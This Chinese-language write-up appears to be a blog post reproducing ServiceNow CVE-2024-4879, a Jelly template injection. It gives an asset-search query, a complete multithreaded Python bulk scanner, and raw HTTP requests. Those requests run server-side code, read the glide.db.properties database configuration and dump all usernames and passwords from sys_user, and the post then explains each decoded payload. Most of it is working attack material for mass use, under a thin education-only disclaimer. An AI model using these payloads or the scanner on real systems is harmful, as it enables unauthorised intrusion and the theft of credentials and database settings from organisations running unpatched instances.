声明:本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动,将与本文档的作者或发布者无关。
一、漏洞描述
ServiceNow是一家专注于提供企业级云计算服务的企业,其旗舰产品是基于云的服务管理解决方案,旨在协助各组织简化及自动化其业务流程。然而,该公司的Jelly模板和Glide表达式存在安全漏洞,这使得未经授权的攻击者有机会通过构建恶意请求来利用这些漏洞,进而实现远程代码的执行。
二、资产收集
1.使用网络空间测绘引擎搜索
鹰图检索:web.body="ConditionalFocus.jsdbx"
2.使用poc批量扫描
# 导入所需库
import requests
import argparse
import threading
import queue
import os
from requests.exceptions import RequestException
from datetime import datetime
import urllib3
import signal
import sys# 禁用安全警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)# 定义颜色代码
dimmed_gray_color = '\033[90m'
honey_yellow_color = "\033[38;5;214m"
dim_yellow_color = '\033[33;1m'
cyan_color = '\033[96m'
green_color = '\033[92m'
red_color = '\033[31m'
light_orange_color = '\033[38;5;214m'
reset_color = '\033[0m'# 显示横幅信息
def banner():print(f"""
{light_orange_color} ______ _______ ____ ___ ____ _ _ _ _ ___ _____ ___ / ___\ \ / / ____| |___ \ / _ \___ \| || | | || | ( _ )___ / _ \
| | \ \ / /| _| _____ __) | | | |__) ||| |_ _____||| |_ / _ \ / / (_) |
| |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____|__ _| (_) |/ / \__, |\____| \_/ |_____| |_____|\___/_____| |_| |_| \___//_/ /_/ {reset_color}-> Bulk scanning tool for ServiceNow CVE-2024-4879 vulnerability.{reset_color}
{reset_color}{dimmed_gray_color}-> By x.com/MohamedNab1l
{light_orange_color}-> Use Wisely.{reset_color}
""")# 日志目录和文件路径
LOG_DIR = 'logs'
LOG_FILE = os.path.join(LOG_DIR, 'scan.log')# 创建日志目录
def create_log_dir():if not os.path.exists(LOG_DIR):os.makedirs(LOG_DIR)print_message('info', f"Log directory created: {LOG_DIR}")# 记录日志信息
def log_message(message):with open(LOG_FILE, 'a') as log_file:log_file.write(f"{datetime.now().strftime('%Y-%m-%d %H:%M:%S')} - {message}")# 打印不同级别的消息
def print_message(level, message):if level == 'vulnerable':print(f"{cyan_color}[VLUN] {message}{reset_color}")if level == 'info':print(f"{dimmed_gray_color}[INFO] {message}{reset_color}")elif level == 'success':print(f"{green_color}[VLUN] {message}{reset_color}")elif level == 'warning':print(f"{honey_yellow_color}[WARNING] {message}{reset_color}")elif level == 'error':print(f"{red_color}[ERROR] {message}{reset_color}")log_message(message)# 需要检查的路径,包含漏洞利用代码
paths_to_check = "/login.do?jvar_page_title=<style><j:jelly xmlns:j=\"jelly\" xmlns:g='glide'><g:evaluate>gs.addErrorMessage(7*191);</g:evaluate></j:jelly></style>"# 发起请求并获取响应内容
def make_request(url):try:response = requests.get(url, verify=False)if response.status_code == 200:return response.textelse:return Noneexcept requests.RequestException as e:return None# 测试目标URL是否受漏洞影响
def test_host(url):try:fullurl = f"{url}{paths_to_check}"body = make_request(fullurl)if body is not None and '>1337<' in body:print_message('vulnerable', f"Vulnerable: {url}")#print(body)else:print_message('warning', f"Not Vulnerable: {url}")except requests.RequestException as e:print_message('error', f"Timeout: {url}")# 工作线程函数,从队列中取出URL并测试其是否受漏洞影响
def worker(queue):while not queue.empty():url = queue.get()print_message('info', f"Testing {url}")test_host(url)queue.task_done()# 处理Ctrl+C信号,优雅退出程序
def signal_handler(sig, frame):print_message('error', 'You pressed Ctrl+C! Exiting gracefully.')sys.exit(0)# 主函数,解析命令行参数并执行相应的操作
def main():signal.signal(signal.SIGINT, signal_handler)banner()parser = argparse.ArgumentParser(description='Bulk scanning tool for ServiceNow CVE-2024-4879.')group = parser.add_mutually_exclusive_group(required=True)group.add_argument('-u', '--url', help='Target URL (e.g., http://example.com)')group.add_argument('-f', '--file', help='File containing list of URLs (one per line)')args = parser.parse_args()create_log_dir()if args.url:print_message('info', f"Testing single target: {args.url}")test_host(args.url)elif args.file:with open(args.file, 'r') as f:urls = [line.strip() for line in f if line.strip()]print_message('info', f"Testing multiple targets from file: {args.file}")url_queue = queue.Queue()for url in urls:url_queue.put(url)threads = []for _ in range(10):t = threading.Thread(target=worker, args=(url_queue,))t.start()threads.append(t)for t in threads:t.join()print_message('info', "Scanning complete.")if __name__ == '__main__':main()
cmd运行:python poc.py -f host.txt
随机寻找的幸运儿
三、漏洞复现
1.构造数据包
1.构造数据包:
GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(111*111);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close2.读取数据库配置
GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E%22 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close3.查看用户名密码
GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egr=new%20GlideRecord(%22sys_user%22);gr.query();s=%22%22;while(gr.next())s=s.concat(gr.user_name,%22%20:%20%22,gr.user_password,%22%3Cbr/%3E%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close2.数据包分析
1.构造数据包
1. 请求行:`GET /login.do?
请求参数
jvar_page_title的值经过URL编码,解码后为:
<style><j:jelly xmlns:j="jelly" xmlns:g="glide"><g:evaluate>gs.addErrorMessage(111*111);</g:evaluate></j:jelly></style>这里是一个典型的服务器端模板注入(SSTI)攻击。攻击者尝试通过篡改请求参数来注入恶意代码。具体来说:
<style>标签被用来插入恶意代码,这样做可能是为了利用CSS的作用域来执行JavaScript代码。<j:jelly>和<g:evaluate>是Jelly模板引擎的标签,用于在服务器端执行Jelly脚本。gs.addErrorMessage(111*111);是Jelly脚本的一部分,它执行了一个乘法运算并将结果添加到错误消息中。这里的乘法运算看起来是无害的,但这可能是为了测试注入是否成功。在更复杂的攻击中,攻击者可能会执行更有害的操作,如读取文件内容、执行系统命令等。2.读取数据库配置
请求参数
jvar_page_title的值经过URL编码,解码后为:
<style><j:jelly xmlns:j="jelly:core" xmlns:g="glide"><g:evaluate>z=new Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style>这里是一个典型的服务器端模板注入(SSTI)攻击。
<style>标签被用来插入恶意代码,这样做可能是为了利用CSS的作用域来执行JavaScript代码。<j:jelly>和<g:evaluate>是Jelly模板引擎的标签,用于在服务器端执行Jelly脚本。z=new Packages.java.io.File("").getAbsolutePath();获取当前工作目录的绝对路径。z=z.substring(0,z.lastIndexOf("/"));从绝对路径中移除最后一个斜杠及其后面的部分,得到父目录的路径。u=new SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();尝试打开位于父目录下名为co..nf/glide.db.properties的文件,并创建一个BufferedReader对象来读取文件内容。s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");逐行读取文件内容,并将其拼接到字符串s中,每行之间用换行符分隔。gs.addErrorMessage(s);将读取到的文件内容作为错误消息添加到系统中。这里的乘法运算看起来是无害的,但这可能是为了测试注入是否成功。在更复杂的攻击中,攻击者可能会执行更有害的操作,如读取文件内容、执行系统命令等。3.查看用户名密码
- 请求参数jvar_page_title的值经过URL编码,解码后为:
- <style><j:jelly xmlns:j="jelly" xmlns:g="glide"><g:evaluate>gr=new GlideRecord("sys_user");gr.query();s="";while(gr.next())s=s.concat(gr.user_name, " : ",gr.user_password,"<br/>");gs.addErrorMessage(s);</g:evaluate></j:jelly></style>
- 这里是一个典型的服务器端模板注入(SSTI)攻击。
- <style>标签被用来插入恶意代码,这样做可能是为了利用CSS的作用域来执行JavaScript代码。
- <j:jelly>和<g:evaluate>是Jelly模板引擎的标签,用于在服务器端执行Jelly脚本。
- gr=new GlideRecord("sys_user");创建一个名为sys_user的GlideRecord对象。
- gr.query();执行查询操作,获取所有用户记录。
- s="";while(gr.next())s=s.concat(gr.user_name, " : ",gr.user_password,"<br/>");遍历查询结果,并将用户名和密码拼接成一个字符串,每个用户的用户名和密码之间用冒号和换行符分隔。
- gs.addErrorMessage(s);将拼接好的字符串作为错误消息添加到系统中。这里的乘法运算看起来是无害的,但这可能是为了测试注入是否成功。在更复杂的攻击中,攻击者可能会执行更有害的操作,如读取文件内容、执行系统命令等。
3.结束跑路
1.构造数据包
2.构造数据包,读取数据库配置
3.查看用户名密码
每篇一言:要不断的移动像水一样,才不会变成死水一样,你要不断流动着!
![[SWPU2019]Web1](https://i-blog.csdnimg.cn/direct/652198a1dd964ea9bc438e208e38f9f5.png)
